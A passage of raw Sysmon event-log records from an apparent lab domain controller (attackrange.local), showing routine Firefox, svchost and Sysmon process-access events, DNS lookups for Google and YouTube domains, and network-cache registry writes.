Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:09.850{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program 
Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 22542200x800000000000000018887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:08.241{59A5CD1D-8E56-6005-2E00-00000000A301}246434.164.18.104.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.678{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.769{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.gstatic.com0type: 5 gstaticadssl.l.google.com;::ffff:172.217.22.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.634{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com02a00:1450:4001:808::2008;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.632{59A5CD1D-945A-6005-3305-00000000A301}7052www-googletagmanager.l.google.com0172.217.23.104;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.631{59A5CD1D-945A-6005-3305-00000000A301}7052www.googletagmanager.com0type: 5 www-googletagmanager.l.google.com;::ffff:172.217.23.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.631{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com02a00:1450:4001:820::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:10.770{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com0172.217.22.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:11.392{59A5CD1D-8E56-6005-2E00-00000000A301}2464104.23.217.172.in-addr.arpa.0type: 12 mil04s23-in-f8.1e100.net;type: 12 mil04s23-in-f104.1e100.net;type: 12 fra16s45-in-f8.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:11.392{59A5CD1D-8E56-6005-2E00-00000000A301}246474.22.217.172.in-addr.arpa.0type: 12 fra15s17-in-f74.1e100.net;type: 12 fra15s17-in-f10.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.522{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.522{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:13.475{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 
22542200x800000000000000018903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:12.407{59A5CD1D-8E56-6005-2E00-00000000A301}246435.22.217.172.in-addr.arpa.0type: 12 fra15s16-in-f3.1e100.net;type: 12 fra15s16-in-f35.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.162{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.162{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527088C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:16.131{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla 
Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:18.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program 
Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 22542200x800000000000000018912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:20.626{59A5CD1D-8E56-6005-2E00-00000000A301}2464110.18.217.172.in-addr.arpa.0type: 12 fra16s42-in-f14.1e100.net;type: 12 zrh04s05-in-f110.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:18.631{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.18.110;::ffff:172.217.18.174;::ffff:172.217.21.206;::ffff:172.217.22.14;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.142;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.206.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;::ffff:172.217.16.174;::ffff:172.217.16.206;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:21.334{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program 
Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:23.053{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:23.053{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:39.255{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:39.255{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000018921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000018920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 
13241300x800000000000000018919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6eda3-0x00d6261f) 13241300x800000000000000018918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000018917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:05:40.349{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000018930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYST